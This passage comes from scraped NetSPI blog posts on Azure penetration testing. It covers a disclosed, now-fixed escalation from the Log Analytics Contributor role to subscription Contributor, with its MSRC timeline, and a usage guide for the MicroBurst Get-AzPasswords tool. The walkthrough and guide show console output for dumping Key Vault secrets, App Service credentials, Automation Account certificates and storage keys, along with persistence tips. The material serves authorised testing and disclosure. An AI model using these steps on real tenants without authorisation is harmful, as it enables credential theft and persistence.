These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.
Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).
Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.
Attack Walkthrough
Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.
Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.
In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.
On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.
PS C:\temp> Connect-AzAccount Account SubscriptionName TenantId Environment ------- ---------------- -------- ----------- LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud
Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.
PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1 Imported AzureAD MicroBurst functions Imported MSOnline MicroBurst functions Imported Misc MicroBurst functions Imported Azure REST API MicroBurst functions
Using the Get-AZPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.
PS C:\temp> Get-AzPasswords -Verbose VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED] VERBOSE: Getting List of Azure Automation Accounts... VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook VERBOSE: Waiting for the automation job to complete VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account VERBOSE: Password Dumping Activities Have Completed
We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.
PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My Thumbprint Subject ---------- ------- A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5 Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]} Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext PS C:\temp> Get-AzContext | select Account,Tenant Account Subscription ------- ------ d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5 PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352 Scope : /subscriptions/7a[REDACTED]b5 DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM= SignInName : RoleDefinitionName : Contributor RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b ObjectType : ServicePrincipal CanDelegate : False Description : ConditionVersion : Condition :
MSRC Submission Timeline
Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.
Here’s a general timeline of the MSRC reporting process:
- NetSPI initially reports the issue to Microsoft – 10/15/20
- MSRC Case 61630 created – 10/19/20
- Follow up email sent to MSRC – 12/10/20
- MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
- Multiple back and forth emails to determine disclosure timelines – March-July 2021
- Microsoft updates the role documentation to address the issue – July 2021
- NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
- Microsoft removes Automation Account permissions from the LAC Role – August 2021
Postscript
While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions:
"actions": [ "*/read", "Microsoft.ClassicCompute/virtualMachines/extensions/*", "Microsoft.ClassicStorage/storageAccounts/listKeys/action", "Microsoft.Compute/virtualMachines/extensions/*", "Microsoft.HybridCompute/machines/extensions/write", "Microsoft.Insights/alertRules/*", "Microsoft.Insights/diagnosticSettings/*", "Microsoft.OperationalInsights/*", "Microsoft.OperationsManagement/*", "Microsoft.Resources/deployments/*", "Microsoft.Resources/subscriptions/resourcegroups/deployments/*", "Microsoft.Storage/storageAccounts/listKeys/action", "Microsoft.Support/*" ]
More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.
Looking for an Azure pentesting partner? Consider NetSPI.
[post_title] => Escalating Azure Privileges with the Log Analytics Contributor Role [post_excerpt] => Learn how cloud pentesting expert Karl Fosaaen found and reported a Microsoft Azure vulnerability that allowed an Azure AD user to escalate from the Log Analytics Contributor role to the full Subscription Contributor role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => escalating-azure-privileges-with-the-log-analystics-contributor-role [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:24:10 [post_modified_gmt] => 2023-03-16 14:24:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11855 [menu_order] => 367 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 26141 [post_author] => 53 [post_date] => 2021-08-13 15:12:35 [post_date_gmt] => 2021-08-13 20:12:35 [post_content] =>Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.
[wonderplugin_video iframe="https://youtu.be/m1xxLZVtSz0" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]
[post_title] => Azure Pentesting: Extracting All the Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-pentesting-extracting-all-the-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-06-22 20:06:04 [post_modified_gmt] => 2023-06-23 01:06:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=26141 [menu_order] => 53 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 11753 [post_author] => 10 [post_date] => 2020-10-22 07:00:26 [post_date_gmt] => 2020-10-22 07:00:26 [post_content] =>It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.
For those that just want to jump to information on specific services, here's links to each section:
Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.
AzureRM Versus Az
As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much needed switch, as the AzureRM modules are being replace by the Az modules.
New updates for MicroBurst! I’ve ported the previous scripts to the Az module cmdlets (from AzureRM/Azure) and moved them to their own folder. All of the previous scripts will still be there, just under different folders (organized by module dependency). https://t.co/h3EwMt9JWZ
— Karl (@kfosaaen) March 19, 2020
Along with these updates I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based off of the modules the script was using.
Going forward, Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switches over to the newly renamed version "Get-AzPasswords" in the Az folder in MicroBurst.
Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.
I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.
Function Usage
For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.
Step 1. Import the MicroBurst Module
PS C:\MicroBurst> Import-Module .MicroBurst.psm1 Imported Az MicroBurst functions Imported AzureAD MicroBurst functions Imported MSOnline MicroBurst functions Imported Misc MicroBurst functions Imported Azure REST API MicroBurst functions
Step 2. Authenticate to the Azure Tenant
PS C:\MicroBurst> Login-AzAccount Account SubscriptionName TenantId Environment ------- ---------------- -------- ----------- test@example.com TestSubscription 4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud
Step 3. Gather Passwords
PS C:\MicroBurst> Get-AzPasswords -Verbose VERBOSE: Logged In as test@example.com VERBOSE: Getting List of Key Vaults... VERBOSE: Exporting items from testingKeys VERBOSE: Getting Key value for the testKey Key VERBOSE: Getting Secret value for the TestKey Secret VERBOSE: Getting List of Azure App Services... VERBOSE: Profile available for microburst-application VERBOSE: Getting List of Azure Container Registries... VERBOSE: Getting List of Storage Accounts... VERBOSE: Getting the Storage Account keys for the teststorage account VERBOSE: Getting List of Azure Automation Accounts... VERBOSE: Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook VERBOSE: Waiting for the automation job to complete VERBOSE: Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account VERBOSE: Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account VERBOSE: Getting cleartext credentials for the autoadmin Automation Account VERBOSE: Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook VERBOSE: Waiting for the automation job to complete VERBOSE: Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account VERBOSE: Password Dumping Activities Have Completed
*Running this will "Out-GridView" prompt you to select the subscription(s) to gather credentials from.
For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".
With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.
Key Vaults (-Keys Y)
Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.
Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.
An example Key Vault Secret:
Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.
Sample Output:
Type : Key Name : DiskKey Username : N/A Value : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty ":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"} PublishURL : N/A Created : 5/19/2020 5:20:12 PM Updated : 5/19/2020 5:20:12 PM Enabled : True Content Type : N/A Vault : notArealVault Subscription : NotARealSubscription Type : Secret Name : TestKey Username : N/A Value : Karl'sPassword PublishURL : N/A Created : 3/7/2019 9:28:37 PM Updated : 3/7/2019 9:28:37 PM Enabled : True Content Type : Password Vault : notArealVault Subscription : NotARealSubscription
Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.
Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.
App Services (-AppServices Y)
Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.
In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.
These publish profiles will contain Web and FTP credentials that can be used to get access to the App Service's files. In addition to that, any stored connection strings should also be available in the file. All available profile credentials are all parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.
Sample Output:
Type : AppServiceConfig Name : appServicesApplication - Web Deploy Username : $appServicesApplication Value : dS[REDACTED]jM PublishURL : appServicesApplication.scm.azurewebsites.net:443 Created : N/A Updated : N/A Enabled : N/A Content Type : Password Vault : N/A Subscription : NotARealSubscription Type : AppServiceConfig Name : appServicesApplication - FTP Username : appServicesApplication$appServicesApplication Value : dS[REDACTED]jM PublishURL : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot Created : N/A Updated : N/A Enabled : N/A Content Type : Password Vault : N/A Subscription : NotARealSubscription Type : AppServiceConfig Name : appServicesApplication-Custom-ConnectionString Username : N/A Value : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9" PublishURL : N/A Created : N/A Updated : N/A Enabled : N/A Content Type : ConnectionString Vault : N/A Subscription : NotARealSubscription
Potential next steps for App Services have been outlined in another NetSPI blog post here.
Automation Accounts (-AutomationAccounts Y)
Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.
Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.
To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.
The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.
Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.
Sample Output:
Type : Azure Automation Account Name : kfosaaen Username : test Value : testPassword PublishURL : N/A Created : N/A Updated : N/A Enabled : N/A Content Type : Password Vault : N/A Subscription : NotARealSubscription
As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post, but I think it's worth noting here, since it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.
And one final note on gathering credentials from Automation Accounts. It was noted above, but sometimes Azure Automation Accounts can be slow to respond. If you're having issues getting a runbook to run and cancel the function execution before it completes, you will need to manually go in and clean up the runbooks that were created as part of the function execution.
These will always be named with a 15-character random string of letters (IE: lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up as well, and they will have the same name as the ones that were uploaded for execution.
Storage Account Keys (-StorageAccounts Y)
Storage Accounts are the multipurpose (Public/Private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure storage explorer application to remotely mount storage accounts.
These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, these would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accoun